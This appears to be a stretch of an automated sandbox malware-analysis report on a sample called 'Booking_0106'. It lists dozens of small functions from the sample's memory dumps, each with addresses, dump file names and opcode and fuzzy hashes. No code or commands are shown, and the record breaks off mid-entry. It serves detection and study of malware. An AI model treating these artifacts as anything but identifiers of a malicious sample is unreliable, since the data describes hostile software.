Instruction Fuzzy Hash: 0EF03A70E14208AFCB44DFA8E445AACBFF4EB09210F10C5AAEC59A3391DA309A54DF50

Function 05B20A60 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732636387.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58c931ccf2350b570584ea812859128fb28c241210b0a49f0a63f2de885e24ef
Instruction ID: 02f86fe803744a5c9e580378139d3ee73eee7520594cbc29d4f8686eaf1a7301
Opcode Fuzzy Hash: 58c931ccf2350b570584ea812859128fb28c241210b0a49f0a63f2de885e24ef
Instruction Fuzzy Hash: 22F0827580410CFFCB00EF98D841BACBFB1EB48310F04C499EC4856340C6319A11EF90

Function 059E8F80 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530adad1fa5291de75d8a8ae4aa86478b3c1b59dc72692167a93fe896f6aec2f
Instruction ID: a8a7ce884058dc452166f9d5b482fe1e69892883f674943cf48d059ba13779b8
Opcode Fuzzy Hash: 530adad1fa5291de75d8a8ae4aa86478b3c1b59dc72692167a93fe896f6aec2f
Instruction Fuzzy Hash: 5AF0A0312483454FC7119A2AEC84C4BFFABDEC0224314853AA15A8B226DA74EC4A8BA0

Function 05B216A1 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732636387.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c285948c95f18d420f0ed120f5003ae9a6554e909440029f71085be2363f0946
Instruction ID: 761d1420e2fd497f268b521f5d5149946d526c98a53d8cdb0d9c541af7d286fd
Opcode Fuzzy Hash: c285948c95f18d420f0ed120f5003ae9a6554e909440029f71085be2363f0946
Instruction Fuzzy Hash: FFF03034905118ABCB40DBA8D845BADBFB5EB49314F18C1A9EC4456351CA31AA01DFA4

Function 01430AE4 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5057454014784a0c471b4c5d1bdac52e7ba7cb9661cb6bc1b9d9e9523b1a1cbe
Instruction ID: 45118d0e11aad621d9f91cbb30338c70f8bde5709fcb9a2c5477af942cefc003
Opcode Fuzzy Hash: 5057454014784a0c471b4c5d1bdac52e7ba7cb9661cb6bc1b9d9e9523b1a1cbe
Instruction Fuzzy Hash: 17F06C3465C3844FC7569F78E8584A83FF2EF5622432545EBE846CB767CA658C12C711

Function 059E8F31 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0da91fa000f6a621e1c9a2b741fd06b27d56de09a8e27cf6a6ed34b95310cc5
Instruction ID: c60a9a7ff313457700aabb22b7b104be86e8c512a8583b129fe0a95572802586
Opcode Fuzzy Hash: b0da91fa000f6a621e1c9a2b741fd06b27d56de09a8e27cf6a6ed34b95310cc5
Instruction Fuzzy Hash: 44E02072B592124FE722055CAC8072DE5D7EBB1654F444A3AFC19C7385E915CC07C7C0

Function 059525F8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0be1c87b050e829a04b1ab60cee8ac50ad50b4842a9a41c261eaaf348f93aea
Instruction ID: 08b8e7da3f509d1b7dae8ec61d2e854c1fe2bfa19b979b578626910f7dbd0774
Opcode Fuzzy Hash: f0be1c87b050e829a04b1ab60cee8ac50ad50b4842a9a41c261eaaf348f93aea
Instruction Fuzzy Hash: 5CF01C74D05248EFCB80DFA9D840AADBBF8AB48310F14C4AAAC58D3341D6359A11DF50

Function 05B21578 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732636387.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78ab46ec3bcb3dc29978340a66fb04da21743a3e7193bc8ad6838b0c72bdc18
Instruction ID: 740d3b715e5fe8328bb09c6db63f620d3ec4ce347cc3b8983736167f0ebff96b
Opcode Fuzzy Hash: a78ab46ec3bcb3dc29978340a66fb04da21743a3e7193bc8ad6838b0c72bdc18
Instruction Fuzzy Hash: A9F0A0B4D49288AFCB01CBE4C9406ECBFB1EB5A310F2481DAD85993292C6355B02DF60

Function 01438BD2 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0eada860e90b45c9ed385acb3cb420539c6a8dbb2b380e2105c3329a8db072f
Instruction ID: c3c587d358b303ed724c4f85bf2fd8a0d17745f123446d251c0c26a70f7091f8
Opcode Fuzzy Hash: f0eada860e90b45c9ed385acb3cb420539c6a8dbb2b380e2105c3329a8db072f
Instruction Fuzzy Hash: 38F0D474D05108EBCB84DFA8D845A9DFBF4EB88310F14C1AAA81892351DB319A51DF80

Function 059E2040 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c30a4dadfa3ff048bb163de640562443f1454ccad1116b8927c7352fab27b88d
Instruction ID: 26ce32f6b4f2c058b2f379f422600e1b45ce2d51979fffe6729b8d911c45eae3
Opcode Fuzzy Hash: c30a4dadfa3ff048bb163de640562443f1454ccad1116b8927c7352fab27b88d
Instruction Fuzzy Hash: B8F06535A08618AFDF0ADB98D449BDDBFBAEB84611F048095E00A97290DB751A85CB84

Function 01438446 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a9bcc8474c0ebc421ea22e9ffd252a7ee7813135065e37605f53b7a2239337d
Instruction ID: 4b93aba95359b45700eccf4574b82183ac04bf3356cd5ab5478bf87d596df303
Opcode Fuzzy Hash: 5a9bcc8474c0ebc421ea22e9ffd252a7ee7813135065e37605f53b7a2239337d
Instruction Fuzzy Hash: ACF0F8B5A0521ACFCB14CF95D440AEDFBB1FB9D300F6142AAE209A7221D7309A41CF10

Function 059E8F90 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce14c489b703074db03b19e33d590d458880836e14ded843fa627eef894e402b
Instruction ID: 907920302d2b2b9f84c0b7c66e32a5a72e6f9bcf70e0500c4b30aee27ba34f4f
Opcode Fuzzy Hash: ce14c489b703074db03b19e33d590d458880836e14ded843fa627eef894e402b
Instruction Fuzzy Hash: F3E012313042055FCB149A1AE984C4BFB9ADED02647108539A15A87625DE70ED498790

Function 05954F98 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fdcb0fe06466a3a080f8d93bcb463d16240e532711d29345d8a6fda7399002d
Instruction ID: c1f90363c78eeb25ad3c2dfa46fe0f13f5af1316e4393b8c197a6d5cd5760a6e
Opcode Fuzzy Hash: 1fdcb0fe06466a3a080f8d93bcb463d16240e532711d29345d8a6fda7399002d
Instruction Fuzzy Hash: 7CF03970E14208EFCB80EFA9E0496ACFFF4EB05210F10C5A9EC48A3391DA309A50DF50

Function 05954F41 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3366deb0fe031002357e478f698b2cea829f112f208a5df522546c26b3063fe
Instruction ID: 6fcd0ff10b99f6809dd23fa57b0dc69d9dca28faa5d3e9cacf3083781144acfe
Opcode Fuzzy Hash: e3366deb0fe031002357e478f698b2cea829f112f208a5df522546c26b3063fe
Instruction Fuzzy Hash: F4F0ED75914208DFC784DFA8E484A98BBF8FB08610F2044EAE809D7351EB309A54CB50

Function 05954EB1 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df77fd7df3f2e072ef2abffae25d4fcc5ec7be77dd719535f879c2925a1648d2
Instruction ID: 7256ed857396421fe1df9fdc51f637e1c7f0a16ec81fd6f161dd895db4e160e1
Opcode Fuzzy Hash: df77fd7df3f2e072ef2abffae25d4fcc5ec7be77dd719535f879c2925a1648d2
Instruction Fuzzy Hash: 91F0ED7591510CDFC784DFA8E585ADC7FF8AB08314F1045AAE809D3350EA309A98CF50

Function 05952B4A Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c25bea69f3c4e65e1690d05fb6080290430d41ce85cc4cf7dd96b2c5e4d5499
Instruction ID: 29cba76a15b5d9978d4849c5fe57a38bb61b2ecd5fb801e0eebc0bf498eb1226
Opcode Fuzzy Hash: 3c25bea69f3c4e65e1690d05fb6080290430d41ce85cc4cf7dd96b2c5e4d5499
Instruction Fuzzy Hash: 76F0F839E0410DDFCF10DFA5E0446EEBBB1FB58311F10842AD922A7244C6301965CF80

Function 05C6678F Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3d4a2962040d88868d3476106ea019c6c172166ba6b6ffe52253435af7a53a
Instruction ID: 6559198ae8c61bc143e09bac75efde689eee46da511509a01dfb4b2482f0f59c
Opcode Fuzzy Hash: 1c3d4a2962040d88868d3476106ea019c6c172166ba6b6ffe52253435af7a53a
Instruction Fuzzy Hash: 44F03A74A142188FC766DF29D8999EA77B6FBA8300F1082D8E11DA7388CF345E858F51

Function 0143C909 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef5bfee4f19fc96d82f3986525d4b57aedac4106a0d31962ccf5109161a7ee7
Instruction ID: 587cd1f191e4b2b29769cf6e347154f62d086ca08346231fbee2ef65bccff3eb
Opcode Fuzzy Hash: 4ef5bfee4f19fc96d82f3986525d4b57aedac4106a0d31962ccf5109161a7ee7
Instruction Fuzzy Hash: 39E04834644118DBC704DA98D88179DBB74DF89304F14819DD84867391DB319902DB91

Function 059E3FD8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4672d20d5189508dac67ca4f3352941ab632fb701b101d70fb0d2f0c1d5374a4
Instruction ID: 9033a63550f569048ae5f7f4ffe09334aa8bd4238a13342db61f76c115671ea0
Opcode Fuzzy Hash: 4672d20d5189508dac67ca4f3352941ab632fb701b101d70fb0d2f0c1d5374a4
Instruction Fuzzy Hash: 8DE086313403089BCB5666A45904B6132D9AB46611F110C79D6095B380DA62FC4287A1

Function 059574DA Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01913cd556e1b88eb79256a1e5d3e3a8b5faf7bd8400579ea14a3af0930c38b
Instruction ID: 47a286300499eebd894fab9f0ffd6e4f554f204a916356510b9c9a615266c461
Opcode Fuzzy Hash: f01913cd556e1b88eb79256a1e5d3e3a8b5faf7bd8400579ea14a3af0930c38b
Instruction Fuzzy Hash: B8F0C974E04208EFCB54DFA9E445A9CBBF8FB48310F1085A9E805D3311D630AA50DF51

Function 05950476 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf3f176bfed0793a0aba3f79d62dd832531b386d91e694f1cdbb2d10fd3d4a6
Instruction ID: e8864121ed6a6b7dd2955ad0335caedf6d9056ea134f4aa8343918bf21b50a68
Opcode Fuzzy Hash: 3cf3f176bfed0793a0aba3f79d62dd832531b386d91e694f1cdbb2d10fd3d4a6
Instruction Fuzzy Hash: 24F0AA70905229CFDB20DF64CA89BECBBB2BB48325F1009EAD409B2250C7355ED4CF12

Function 05B20A70 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732636387.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e3f12a8030aea60c1e918c43b7a30687481a8a7c728f2e77abc014cef3bb1d7
Instruction ID: 2294738009df0017882809e058311df91b33013c7f331d71a23fe167d9357e0c
Opcode Fuzzy Hash: 9e3f12a8030aea60c1e918c43b7a30687481a8a7c728f2e77abc014cef3bb1d7
Instruction Fuzzy Hash: 44F0C93490920CEFCB45DF94D844AACBBB5EB49310F14C599EC5956351C6329A51EF90

Function 05C797A0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80abd567a25ec34381967f8a404856cec62d111d863e45f04ae1746ddac80949
Instruction ID: e9010ebb1f5b71a6a69585009aec9d98e466d1cdd5ccfc1fc14a14962c02f358
Opcode Fuzzy Hash: 80abd567a25ec34381967f8a404856cec62d111d863e45f04ae1746ddac80949
Instruction Fuzzy Hash: 87E0E574E0420CEFCB84DFA9D485AACFBF5EB49310F10C5AAA818A3340DA319A51DF90

Function 05C7C558 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80abd567a25ec34381967f8a404856cec62d111d863e45f04ae1746ddac80949
Instruction ID: aa77ed02db0e74c6ce0cb4273931a8d0008dc203f98ee2beace2824c1affa474
Opcode Fuzzy Hash: 80abd567a25ec34381967f8a404856cec62d111d863e45f04ae1746ddac80949
Instruction Fuzzy Hash: 62E0C974E0420CEFCB94DFA9D44469CBBF5EB49310F10C5A9980993340D6329A51DF50

Function 05C7ACC8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80abd567a25ec34381967f8a404856cec62d111d863e45f04ae1746ddac80949
Instruction ID: 7800bea05c884f784b5c02c27e74b2c9d21ea4f88b26521b774fdafaca0e1adf
Opcode Fuzzy Hash: 80abd567a25ec34381967f8a404856cec62d111d863e45f04ae1746ddac80949
Instruction Fuzzy Hash: D8E0ED74E0820CEFCB44DFA9D945A9CFBF5FB48310F14C5A9980993340D6329A51DF50

Function 05C75468 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80abd567a25ec34381967f8a404856cec62d111d863e45f04ae1746ddac80949
Instruction ID: aa4740abfe67e34dd6102fdcdd72455b4d22d9c8f6a8011d724e7dec8ddf79b6
Opcode Fuzzy Hash: 80abd567a25ec34381967f8a404856cec62d111d863e45f04ae1746ddac80949
Instruction Fuzzy Hash: 02E0C974E0420CEFCB44DFA9D44469CBBF5FB48311F10C5A9980993340DA32AA51DF50

Function 01437BA8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ae590559cf7676ab164c278d8293574ea2a5780af20a22cfdac5235a81e2df
Instruction ID: 11aa33ae3803ab562b05f343d71e772a2bc3266fa2eda954da672405919af090
Opcode Fuzzy Hash: 15ae590559cf7676ab164c278d8293574ea2a5780af20a22cfdac5235a81e2df
Instruction Fuzzy Hash: F9E026B28C0108EFD700EFF4E80838E3BF8EB28205F0040A1D10493254FF318A018B62

Function 0143C4C0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c010f3c443570507894fd4ae1c5f78a922efa36f7b63d73825e4cba50b40bc56
Instruction ID: 356e7cd6f6876b1620e33ad78bbb0f1438ef09d4064a96fe98c1d44dfe9b803f
Opcode Fuzzy Hash: c010f3c443570507894fd4ae1c5f78a922efa36f7b63d73825e4cba50b40bc56
Instruction Fuzzy Hash: 59E08C30244018DBC750CAA8D982BE8B7A8D755210F9480BE9C08E7391CA36A906DBA1

Function 0595DD08 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53036067b7cd311362950e3136943f59d8d4b874a14be1025d90edb675f77ab6
Instruction ID: 864eecc6e712c5d0ab5d93878e90b1fd1113510ef79c0227bc1091ea15c54c9f
Opcode Fuzzy Hash: 53036067b7cd311362950e3136943f59d8d4b874a14be1025d90edb675f77ab6
Instruction Fuzzy Hash: A8E0E5B0D0520CEFCB54DFA8D44469DBBF5EB49310F1085A99808A3300DA355B51DF91

Function 0595FCC8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761be76bcf51ab04c42a5b5f46cb8b0818ed9323c48b8243bab6333ce8200346
Instruction ID: b5a8f0f34a8921f9a5b652ad447e92f775e7523cbfde90c7393b9c0f70fbfda7
Opcode Fuzzy Hash: 761be76bcf51ab04c42a5b5f46cb8b0818ed9323c48b8243bab6333ce8200346
Instruction Fuzzy Hash: ADE0E5B4E04208EFCB84DFA9D4446ACBBF4FB48320F10C5A99C1893340DA319A12CF40

Function 059574E0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b5b49af1426c7d7f964bf7fa07531adc79a53340cbad96343186be843b8e99d
Instruction ID: f4ad4faf5320efb08362baddafab99fb445c1851838b05149c725c2a1d3142b5
Opcode Fuzzy Hash: 2b5b49af1426c7d7f964bf7fa07531adc79a53340cbad96343186be843b8e99d
Instruction Fuzzy Hash: A2E0E5B4E04208EFCB84DFA9E448A9CBBF8FB48310F1085E9E80993310D630AA50CF51

Function 05954EF8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1332a3ae1ca51ae0c47df3eaba6636b17136fc585c8d3299a21bc16bdde1fb4
Instruction ID: 7070b37cf5e25505eb539345e997934956fefd285f5150ee1224cc7260075d59
Opcode Fuzzy Hash: a1332a3ae1ca51ae0c47df3eaba6636b17136fc585c8d3299a21bc16bdde1fb4
Instruction Fuzzy Hash: 92E01A3091920CEFCB80DFA8E8467ECBFF8A704211F5094A9EC09D2200EB306A58EB51

Function 05C78D90 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f309c7051bd069d83733dcbf5f1438e420f5869c8129c9687d262613545678b
Instruction ID: 13cdfbdaef9d34f6247ae2392ce91653c226158ce7207c955054345aad8a0838
Opcode Fuzzy Hash: 4f309c7051bd069d83733dcbf5f1438e420f5869c8129c9687d262613545678b
Instruction Fuzzy Hash: C7E0E574E0420CEFCB84DFA9D4446ACBBF4FB58300F20C5AA981893340DA359B41CF81

Function 05C79480 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f309c7051bd069d83733dcbf5f1438e420f5869c8129c9687d262613545678b
Instruction ID: d7233db5b583c10fdb135d803141f2c472158fd7c988187677cc522d22a67828
Opcode Fuzzy Hash: 4f309c7051bd069d83733dcbf5f1438e420f5869c8129c9687d262613545678b
Instruction Fuzzy Hash: 58E0C274E04208EFCB94DFA9D5456ACBBF4EB88210F10C5A99818A3340DA319A01DF40

Function 01431E3F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b41f74907f73ba8f3eeb888868f5bab860f30b330c202c8f758e77bdce35dead
Instruction ID: 8c51fcd39d3e722e37f2d7fcb5116bb0965dc93ae6e8d3e34a6cd56654ee5a4d
Opcode Fuzzy Hash: b41f74907f73ba8f3eeb888868f5bab860f30b330c202c8f758e77bdce35dead
Instruction Fuzzy Hash: 42F0ED3484A388EFCB91CFB4E9104AC7BF1EB85210B0042EEC405D7262D6354E098B41

Function 059E3BB0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f329c77ce4808f10f16a4a91705c40977aeadd687ddd464501bad15d978036
Instruction ID: 90c40a3403cb52a2045b696de1c999b34e809cbdf484313ef4ec672be4e72cf5
Opcode Fuzzy Hash: 92f329c77ce4808f10f16a4a91705c40977aeadd687ddd464501bad15d978036
Instruction Fuzzy Hash: 23D017A355C2D60FD7138A609C2BBC63F208722105F0884E2A891CB3A7E604C507C7B6

Function 0595DA50 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a795f80044c2fdc2699a888a8c5b2ead81ae5c176d151503d6a4bd2eb2010ddd
Instruction ID: dc5fb47e152b5add6916bdc027b2e214083e76ad9b3ca9b6ffcb12ed8e56332e
Opcode Fuzzy Hash: a795f80044c2fdc2699a888a8c5b2ead81ae5c176d151503d6a4bd2eb2010ddd
Instruction Fuzzy Hash: DCE01A70E0930CEFCB54DFA8E44429DBBF5AB48310F1085A9980893300E7345B50DF40

Function 05B216B0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732636387.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 911201970f7552528946b60ccbb685fff9a8612708e1f0aefba23fe56ae7d489
Instruction ID: a5c3cbb450b0e7c784b42dcea34c9cd53c4462a99c5b7993b30d77f8398d45b9
Opcode Fuzzy Hash: 911201970f7552528946b60ccbb685fff9a8612708e1f0aefba23fe56ae7d489
Instruction Fuzzy Hash: 6EE0E574908208EBCB45DF99D4449ACBBF5EB48310F14C1AAE85853351DA32AA51DFA4

Function 05B21588 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732636387.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

